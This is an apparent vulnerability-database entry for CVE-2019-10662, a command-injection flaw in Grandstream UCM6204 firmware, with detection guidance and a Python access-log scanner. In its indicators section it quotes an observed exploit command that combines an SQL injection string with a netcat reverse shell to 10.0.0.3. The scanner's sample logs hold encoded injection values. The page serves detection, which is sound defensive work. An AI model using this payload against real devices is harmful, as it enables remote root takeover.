CVE-2019-10662
Published 2019-03-30
Priority: P2 (72), high
CVSS 3.1 base score 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: available
EPSS: 43.76% (98.6th percentile)
Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig file-backup parameter to the /cgi? URI.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| grandstream | ucm6204_firmware | < 1.0.19.20 | 1.0.19.20 |
Detection & IOCs (extracted from sources)
Command observed in the sources: /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
- Monitor HTTP requests to the /cgi? URI containing shell metacharacters (backticks, semicolons, ${IFS}) in the backupUCMConfig parameter, indicative of CVE-2019-10662 exploitation attempts.
- Detect SQL injection payloads combined with shell metacharacters in the username field of the Forgot Password / sendPasswordEmail function, particularly patterns matching `' or 1=1--` followed by backtick-enclosed nc/shell commands.
- Alert on process execution of sendMail.py invoked via popen/shell with attacker-controlled arguments, especially if followed by nc (netcat) spawning a reverse shell as root.
- Flag Grandstream UCM62xx devices running firmware versions below 1.0.19.20 as vulnerable to authenticated command injection via CVE-2019-10662.
- Note: the Metasploit module targets the unauthenticated exploitation path (CVE-2020-5722 + command injection) and is scoped to UCM62xx firmware versions before 1.0.19.20; detections should account for both the authenticated (CVE-2019-10662, /cgi? endpoint) and the unauthenticated (Forgot Password endpoint) attack surfaces.
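The first detection point above (shell metacharacters in a backupUCMConfig request to /cgi?) as a worked example over access-log lines. This is an added example, not code from the page's sources; it assumes combined-format access logs and a query layout of `action=backupUCMConfig&file-backup=...`, which is an assumption since the page only names the backupUCMConfig action and the file-backup parameter. It percent-decodes values so encoded metacharacters (`%60`, `%3B`, `%24%7BIFS%7D`) are caught too.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters named in the detection guidance, plus $( ) command substitution.
SHELL_META_RE = re.compile(r"`|;|\|\||\||&&|\$\{IFS\}|\$\(")

# Request field of a combined-format access-log line: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic). Line 1 is a benign backup,
# lines 2 and 3 carry encoded metacharacters, line 4 hits /cgi but not backupUCMConfig.
SAMPLE_LOG = [
    '10.0.0.5 - admin [30/Mar/2019:10:00:01 +0000] "GET /cgi?action=backupUCMConfig&file-backup=cfg.tar HTTP/1.1" 200 512',
    '10.0.0.5 - admin [30/Mar/2019:10:00:09 +0000] "GET /cgi?action=backupUCMConfig&file-backup=cfg.tar%60id%60 HTTP/1.1" 200 512',
    '10.0.0.5 - admin [30/Mar/2019:10:00:15 +0000] "GET /cgi?action=backupUCMConfig&file-backup=a%3Bls%24%7BIFS%7D%2Ftmp HTTP/1.1" 200 512',
    '10.0.0.7 - - [30/Mar/2019:10:01:00 +0000] "GET /cgi?action=login&user=x%60id%60 HTTP/1.1" 403 0',
]

def extract_targets(log_lines):
    """Yield (line_no, request target) for every line whose request field parses."""
    for n, line in enumerate(log_lines, 1):
        m = REQ_RE.search(line)
        if m:
            yield n, m.group("target")

def suspicious_params(target):
    """Names of parameters on a /cgi request that references backupUCMConfig and whose
    decoded value contains shell metacharacters; empty list if the request is clean."""
    url = urlsplit(target)
    if url.path != "/cgi":
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    mentions_action = any("backupUCMConfig" in k or any("backupUCMConfig" in v for v in vs)
                          for k, vs in params.items())
    if not mentions_action:
        return []
    return sorted(k for k, vs in params.items() if any(SHELL_META_RE.search(v) for v in vs))

def scan(log_lines):
    """Return [(line_no, [param names])] for lines that look like CVE-2019-10662 attempts."""
    hits = []
    for n, target in extract_targets(log_lines):
        bad = suspicious_params(target)
        if bad:
            hits.append((n, bad))
    return hits

if __name__ == "__main__":
    for line_no, names in scan(SAMPLE_LOG):
        print(f"line {line_no}: shell metacharacters in {names}")
```

Line 4 is deliberately not flagged: it shows the rule is scoped to the backupUCMConfig action, so a separate rule is needed for the Forgot Password path described in the second bullet.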
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
No detection rules found.